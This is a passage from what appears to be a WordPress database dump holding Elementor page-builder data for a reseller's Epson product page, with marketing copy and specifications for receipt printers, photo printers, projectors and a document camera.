Output<\\/li><li>Speed: Up to 300mm\\/sec<\\/li><li>Check printing<\\/li><li>Bi-directional printing<\\/li><li>Supports\\u00a0slip printing, validation and endorsement print<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"ecb5d15\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<div><center>[maxbutton id=\\\"12\\\" ]<\\/center><\\/div>\",\"_margin\":{\"unit\":\"px\",\"top\":\"-2\",\"right\":\"-2\",\"bottom\":\"-2\",\"left\":\"-2\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"48313a9\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"04c8d3f\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>Epson TM-T88V-i\\u00a0<\\/strong>\\n\\n<img class=\\\"alignnone wp-image-2429\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-TM-T88V-i.png\\\" alt=\\\"\\\" width=\\\"243\\\" height=\\\"137\\\" \\/><\\/h4>\\nCreate a world of possibilities with TM-T88V-i Intelligent Solution. Equipped with cloud and web-capabilities, you\'ll have access to a variety of intelligent functions delivered by a compact, space-saving printer that fits easily into your business.\\n<ul>\\n \\t<li>Printing speed of up to 300mm\\/second<\\/li>\\n \\t<li>20 million lines for printer mechanism<\\/li>\\n \\t<li>Up to 2 million for auto-cutter<\\/li>\\n \\t<li>LAN, Serial, USB 2.0 (Type A) x 4<\\/li>\\n \\t<li>Control peripherals easily<\\/li>\\n<\\/ul>\\n<div><center>[maxbutton id=\\\"12\\\" ]<\\/center><\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"a458653\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"693238f\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>Epson TM-T70II\\u00a0<\\/strong><br \\/><br \\/><img class=\\\"alignnone wp-image-2430\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-TM-T70II.png\\\" alt=\\\"\\\" width=\\\"254\\\" height=\\\"143\\\" \\/><br \\/><br \\/><\\/h4><p>The Epson\'s TM-T70II is the smallest in class receipt printer with a full frontal operation.<\\/p><ul><li>Print method: Thermal line printing<\\/li><li>Width: 79\\u00a0\\u00b1\\u00a00.5 mm<\\/li><li>Print Speed: Up to 250 mm\\/ sec<\\/li><li>Auto-cutter feature<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"c9f74e5\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<div><center>[maxbutton id=\\\"12\\\" ]<\\/center><\\/div>\",\"_margin\":{\"unit\":\"px\",\"top\":\"37\",\"right\":\"37\",\"bottom\":\"37\",\"left\":\"37\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"633089e\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"e7998e8\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"4ede29a\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"ca5c009\",\"elType\":\"widget\",\"settings\":{\"title\":\"PHOTO PRINTER\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"9e7182b\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"7eee589\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"4c63255\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>Epson L1800 A3 Photo Ink Tank Printer<\\/strong><\\/h4><p><br \\/><img class=\\\"wp-image-2431 aligncenter\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-L1800-Printer.png\\\" alt=\\\"\\\" width=\\\"241\\\" height=\\\"175\\\" \\/><\\/p><p>In creating the next wave of printing innovation, Epson introduces the worlds first truly affordable 6-colour A3+ original ink tank system printer.<\\/p><ul><li>Yield of up to 1,500 4R photos<\\/li><li>Print speed up to 15ppm<\\/li><li>High-yield ink bottles<\\/li><li>1-year warranty or 9,000 prints<\\/li><\\/ul>\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"7bcc969\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":49,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"561cb4c\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<div style=\\\"text-align: center;\\\">[maxbutton id=\\\"12\\\" ]<\\/div>\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"4abe3ef\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"space_between_widgets\":22},\"elements\":[{\"id\":\"9645bf2\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>Epson L850 Printer\\u00a0<\\/strong><\\/h4><p><img class=\\\"wp-image-2432 aligncenter\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-L850-Printer.png\\\" alt=\\\"\\\" width=\\\"261\\\" height=\\\"147\\\" \\/><\\/p><p>Imaging enthusiasts and professionals can look forward to the 6-colour ink tank system, presenting vibrant borderless prints and unrivalled performance at a remarkably low cost through this 3-in-1 photo printer.<\\/p><ul><li>High-yield ink bottles<\\/li><li>2.7 colour LCD screen<\\/li><li>Direct printing via memory card slot, USB port and PictBridge<\\/li><li>CD\\/DVD printing<\\/li><li>Warranty of 1 year or 3,000 photo prints, whichever comes first<\\/li><\\/ul><div><center>[maxbutton id=\\\"12\\\" ]<\\/center><\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"07c207b\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"8ce4aa3\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>Epson L805 Printer\\u00a0<\\/strong><br \\/><br \\/><img class=\\\"alignnone wp-image-2433\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-L805-Printer-.png\\\" alt=\\\"\\\" width=\\\"240\\\" height=\\\"135\\\" \\/><\\/h4><p><br \\/>The L805s integrated Wi-Fi support and expanded colour gamut of 6 inks brings you ease of printing from your mobile devices over a wireless network so you can print low-cost, lab-quality photos at your convenience.<\\/p><ul><li>Yield of Up to 1,800 4R photos<\\/li><li>Lowest Printing Costs<\\/li><li>Wi-Fi &amp; Epson iPrint<\\/li><li>CD\\/DVD Printing Capability<\\/li><li>1 year or 3,000 prints warranty<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"11bfc36\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<div style=\\\"text-align: center;\\\">[maxbutton id=\\\"12\\\" ]<\\/div>\",\"_margin\":{\"unit\":\"px\",\"top\":\"12\",\"right\":\"12\",\"bottom\":\"12\",\"left\":\"12\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"65279bf\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"c65e6e9\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"4af8eba\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"57b8f7e\",\"elType\":\"widget\",\"settings\":{\"title\":\"Projectors for Work\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"bbe338f\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"4e4173d\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"1c6bf5d\",\"elType\":\"widget\",\"settings\":{\"title\":\"CORPORATE AND EDUCATION\\u00a0\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7e9242e\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"61d6693\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"bd3c8b4\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>Epson EB-2055<\\/strong><\\/h4><p><img class=\\\"wp-image-2434 aligncenter\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-EB-2055.png\\\" alt=\\\"\\\" width=\\\"245\\\" height=\\\"163\\\" \\/><\\/p><p>Leave the lights on and take control whether in the meeting room or classroom. Epson\\u2019s EB-2055 projector is engineered to shine outstandingly even in well-lit environments to enrich your presentation experience. Your brilliant presentations are made even better and more convenient with the new gesture-control function that allows you to navigate between your slides without the use of a peripheral device.<\\/p><ul><li>XGA Resolution<\\/li><li>White and Colour Light Output at 5,000 lumens<\\/li><li>Gesture Presenter<\\/li><li>Multi-PC Projection<\\/li><li>2 x HDMI<\\/li><li>Split Screen<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"646b12f\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<center>[maxbutton id=\\\"12\\\" ]<\\/center>\",\"_margin\":{\"unit\":\"px\",\"top\":\"42\",\"right\":\"42\",\"bottom\":\"42\",\"left\":\"42\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"a9b5eee\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"fe4d6fd\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>Epson EB-2142W<\\/strong><\\/h4><br>\\n<img class=\\\"wp-image-2435 aligncenter\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-EB-2142W.jpg\\\" alt=\\\"\\\" width=\\\"245\\\" height=\\\"138\\\" \\/>\\n\\nEnjoy success and unparalleled performance with Epson business projectors. Fully maximise your office space and experience a variety of connectivity options for your ultimate convenience. Along with long lamp-life and maintenance cycles, potential for saving costs and improving energy efficiency is now made possible for you. Every component is skillfully innovated with attention to detail in mind, including the integrated 3LCD technology that will provide you with stunning colour brightness for quality images.\\n<ul>\\n \\t<li>White and Colour Brightness at 4,200lm<\\/li>\\n \\t<li>WXGA Resolution<\\/li>\\n \\t<li>12000 hours lamp life in eco-mode<\\/li>\\n \\t<li>MHL-enabled<\\/li>\\n \\t<li>Multi-PC Projection<\\/li>\\n \\t<li>Horizontal Keystone Slider<\\/li>\\n \\t<li>Miracast<sup>\\u00ae<\\/sup><\\/li>\\n<\\/ul>\\n<div><center>[maxbutton id=\\\"12\\\" ]<\\/center><\\/div>\",\"_margin\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"2\",\"bottom\":\"2\",\"left\":\"2\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"24b65ae\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a26a32f\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>Epson EB-L500W\\u00a0<\\/strong><\\/h4>\\n<img class=\\\"wp-image-2436 aligncenter\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-EB-L500W.jpg\\\" alt=\\\"\\\" width=\\\"251\\\" height=\\\"142\\\" \\/><br>\\n\\nThe compact, affordable EB-L500W laser projector delivers powerful performance for education and business applications. Get bright, vivid images with 5,000 lumens colour\\/white brightness. This wireless projector also offers WXGA resolution and Full HD support. Featuring breakthrough laser technology, it delivers a laser light source of up to 20,000 hours. And, it offers virtually maintenance-free operation for the life of the optical engine. Plus, it features a Dynamic contrast ratio of up to 2,500,000:1. It also includes wireless networking with enterprise-level security, and advanced installation features.\\n<ul>\\n \\t<li>5,000 lumens colour\\/white brightness<sup>\\u00a0<\\/sup><\\/li>\\n \\t<li>Colourful WXGA; up to 2,500,000:1 Dynamic contrast ratio<\\/li>\\n \\t<li>Laser light source of up to 20,000 hours<\\/li>\\n \\t<li>Virtually maintenance-free for optical engine life<\\/li>\\n<\\/ul>\\n<div><center>[maxbutton id=\\\"12\\\" ]<\\/center><\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"cd625e2\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"8750887\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"16f2278\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"c4ec64b\",\"elType\":\"widget\",\"settings\":{\"title\":\"ACCENT LIGHTING LASER PROJECTORS\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"5f02a57\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"993393a\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"e46d09c\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>Epson LightScene EV-105<\\/strong><br \\/><br \\/><\\/h4><p><img class=\\\"wp-image-2437 aligncenter\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-LightScene-EV-105.jpg\\\" alt=\\\"\\\" width=\\\"263\\\" height=\\\"176\\\" \\/><\\/p><p>Create stunning visual displays and immersive environments with the LightScene EV-105, the cutting-edge digital signage solution from Epson. A convergence of lighting and display technology, LightScene laser projectors captivate audiences by simultaneously illuminating and projecting on virtually any surface or material, unleashing dynamic, experiential content for digital art, commercial signage and d\\u00e9cor applications. Designed to blend in discreetly to any setting \\u2014 from retail, hospitality and event spaces to showrooms and museums \\u2014 LightScene EV-105 offers a sleek, black spotlight design, with an array of configuration, mounting and programming options.<\\/p><ul><li>Laser projector for digital art and signage<\\/li><li>Seamlessly blends into virtually any environment<\\/li><li>Up to 20,000 hours of virtually maintenance-free operation<\\/li><li>360-degree mounting: floors, walls or ceilings<\\/li><li>Remote management and control tools<\\/li><li>Best New Award Overall<\\/li><\\/ul><div><center>[maxbutton id=\\\"12\\\" ]<\\/center><\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"b9132fb\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"5a3decf\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"3a36c38\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"7dad77c\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"b7207fe\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"466ac31\",\"elType\":\"widget\",\"settings\":{\"title\":\"ULTRA PORTABLE\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ccb5acc\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"45f89fa\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"e7ec2bf\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>Epson EB-1785W\\u00a0<\\/strong><\\/h4>\\n<img class=\\\"wp-image-2438 aligncenter\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-EB-1785W.png\\\" alt=\\\"\\\" width=\\\"238\\\" height=\\\"177\\\" \\/>\\n\\nThe Epson EB-1785W packs superior imaging quality along with a suite of connectivity and usability features into a body weighing only 1.83kg and 44mm slim. Wirelessly connect your smart devices to the projector via Wi-Fi, Miracast, iProjection application or NFC technology. The EB-1785W comes with Gesture Presenter technology, which allows you to transit between slides without a clicker. Lastly, with Epson\'s 3LCD technology that delivers up to 3 times wider colour gamut and brightness, you can astound audiences anywhere you go.\\n<ul>\\n \\t<li>White Light Output 3,200 lumens, Colour Light Output 3,200 lumens<\\/li>\\n \\t<li>WXGA Resolution<\\/li>\\n \\t<li>Real-Time Auto Keystone Correction<\\/li>\\n \\t<li>Split Screen Projection<\\/li>\\n \\t<li>Hassle-Free Presentation with USB 3-in-1 Display Feature and Epson iProjection<\\/li>\\n<\\/ul>\\n<div><center>[maxbutton id=\\\"12\\\" ]<\\/center><\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"1914d98\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"b5f42fd\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"e3f8c24\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"d81ddc4\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"4f4cdf2\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"890a1d6\",\"elType\":\"widget\",\"settings\":{\"title\":\"INTERACTIVE\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"c314a77\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"fbcb210\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"1897c27\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>Epson EB-536Wi\\u00a0<\\/strong><\\/h4><p><img class=\\\"wp-image-2439 aligncenter\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-EB-536Wi.png\\\" alt=\\\"\\\" width=\\\"242\\\" height=\\\"136\\\" \\/><\\/p><p>Project large screen sizes even at close range and make your presentations larger-than-life with Epson EB-536Wi projector.<\\/p><ul><li>White and Colour Brightness at 3,400lm<\\/li><li>WXGA Resolution<\\/li><li>Multi-PC projection<\\/li><li>HDMI Connectivity<\\/li><li>Pen Interactivity<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"1dcee02\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<div><center>[maxbutton id=\\\"12\\\" ]<\\/center><\\/div>\",\"_margin\":{\"unit\":\"px\",\"top\":\"-5\",\"right\":\"-5\",\"bottom\":\"-5\",\"left\":\"-5\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"a597712\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"d315157\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>Epson 595Wi\\/585Wi\\/575Wi<\\/strong>\\u00a0<img class=\\\"alignnone wp-image-2440\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-595Wi.png\\\" alt=\\\"\\\" width=\\\"276\\\" height=\\\"155\\\" \\/><\\/h4>\\nWith the finger-touch interactive function and PC-free annotation, you can easily transform any surface into an interactive environment so everyone can throw their ideas on the table.\\n<ul>\\n \\t<li>WXGA Resolution<\\/li>\\n \\t<li>White and Colour Brightness at 3,300lm<\\/li>\\n \\t<li>Multi-PC projection<\\/li>\\n \\t<li>HDMI Connectivity x2<\\/li>\\n<\\/ul>\\n<div><center>[maxbutton id=\\\"12\\\" ]<\\/center><\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"de8ca10\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"61ea7aa\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"e5676d7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"6efc9f3\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"281e34f\",\"elType\":\"widget\",\"settings\":{\"title\":\"HIGH BRIGHTNESS\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7a49451\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"f301a8e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"e7e2436\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>Epson EB-L1405UNL\\u00a0<\\/strong><\\/h4><p><br \\/><img class=\\\"wp-image-2441 aligncenter\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/EB-L1405UNL.png\\\" alt=\\\"\\\" width=\\\"207\\\" height=\\\"117\\\" \\/><\\/p><p>The Epson EB-L1405U projector is designed to deliver unyielding laser performance, from any position to most surfaces, up to 20,000\\u00a0long lasting hours maintenance-free.<\\/p><ul><li>White and Colour Brightness at 8,000lm<\\/li><li>WUXGA (1920 x 1200)<\\/li><li>Edge-blending to create large panoramic images<\\/li><li>Curve and corner wall projection<\\/li><li>HDBaseT<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"8bce658\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":122,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"4eeb26d\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<div style=\\\"text-align: center;\\\">[maxbutton id=\\\"12\\\" ]<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"dd3bc89\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"6d9f7b4\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4><strong>Epson EB-G7400UNL\\u00a0<\\/strong><\\/h4><br>\\n<img class=\\\"wp-image-2442 aligncenter\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-EB-G7400UNL.png\\\" alt=\\\"\\\" width=\\\"205\\\" height=\\\"116\\\" \\/><br>\\n\\nEpson high brightness EB-G7400U projector presents a new perspective on clarity, durability, and versatility. With the advanced C2Fine\\u2122 and 4K Enhancement Technology, projections are brought to life with vibrant colours in extreme resolution and vividness. Overcome the limitations of space constraints and project large and uncompromised images through the projector\\u2019s astoundingly short throw ratio of 0.35*.\\n\\n<em>* With optional ELPLX01 zero offset ultra-short throw lens.<\\/em>\\n<ul>\\n \\t<li>High Brightness<\\/li>\\n \\t<li>Beyond Full HD Resolution<\\/li>\\n \\t<li>Powered Lens<\\/li>\\n \\t<li>Portrait Projection<\\/li>\\n \\t<li>Flexible Installation<\\/li>\\n \\t<li>Edge Blending<\\/li>\\n \\t<li>Point Correction<\\/li>\\n<\\/ul>\\n<div><center>[maxbutton id=\\\"12\\\" ]<\\/center><\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"2860f60\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"abe0604\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>Epson EB-Z10000U\\u00a0<\\/strong><\\/h4><p><br \\/><img class=\\\"wp-image-2443 aligncenter\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-EB-Z10000U.png\\\" alt=\\\"\\\" width=\\\"208\\\" height=\\\"117\\\" \\/><\\/p><p>Discover a powerful way to impress your audience the EB-Z10000U high brightness business projector gives you stunning, high-definition images with its 3LCD technology.<\\/p><ul><li>White and Colour Brightness at 10,000\\u00a0lm<\\/li><li>WUXGA resolution<\\/li><li>High Reliability and Durability<\\/li><li>Suitable for 24\\/7 usage<\\/li><li>Flexible projection angles and installations<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"acb7593\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":144,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"f800ae6\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<div style=\\\"text-align: center;\\\">[maxbutton id=\\\"12\\\" ]<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"185e9fb\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"cfbc8d3\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"23a135e\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"52e4017\",\"elType\":\"widget\",\"settings\":{\"title\":\"DOCUMENT CAMERAS\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"6e2f23c\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"1be2016\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"ccccf17\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>Document Camera ELPDC21\\u00a0<\\/strong><br><br><img src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Document-Camera-ELPDC21.jpg\\\" alt=\\\"\\\" width=\\\"206\\\" height=\\\"137\\\" \\/><\\/h4><br>\\nCut through the hassle, and get straight to your presentation. Epsons series of document cameras not only captures details with Full HD resolution, its versatile connectivity also gives you great functionality.\\n<ul>\\n \\t<li>Pixels: 2MP (1920 x 1080 pixels)<\\/li>\\n \\t<li>Camera Sensor: 1\\/2.7 inch CMOS Sensor<\\/li>\\n \\t<li>Resolution: Up to Full HD (1080p)<\\/li>\\n \\t<li>Zoom: 10x Digital Zoom, 12x Optical Zoom<\\/li>\\n \\t<li>Weight: Approx 3.0kg<\\/li>\\n<\\/ul>\\n<center>[maxbutton id=\\\"12\\\" ]<\\/center>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"d5e60a0\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"b6a1050\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false}]'),(3917,2746,'_wp_page_template','template-fullwidth.php'),(3918,2746,'_elementor_edit_mode','builder'),(3919,2746,'_elementor_template_type','post'),(3920,2746,'_elementor_data','[{\"id\":\"0bcf275\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"829ac8b\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"2449815\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>As a global technology leader, Epson creates and delivers technology solutions for businesses and consumers, from inkjet printers and digital printing systems to 3LCD projectors, smart glasses, sensing systems and industrial robots. The company is focused on driving innovations and exceeding customer expectations in inkjet, visual communications, wearables and robotics.<\\/p><h3>Printers for Work<\\/h3><p>Epson has the best printers for your business requirements regardless documents, photos, receipts, large-formats, labels, or even apparels.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"2698f52\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"93fa1d7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"f872ca9\",\"elType\":\"widget\",\"settings\":{\"title\":\"BUSINESS INKJET 